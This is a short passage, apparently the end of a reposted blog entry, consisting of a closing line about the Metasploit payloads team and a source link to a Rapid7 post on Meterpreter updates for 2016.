this coming year from the Metasploit payloads team! Sursa: https://community.rapid7.com/community/metasploit/blog/2017/01/03/12-days-of-haxmas-meterpreters-new-shiny-for-2016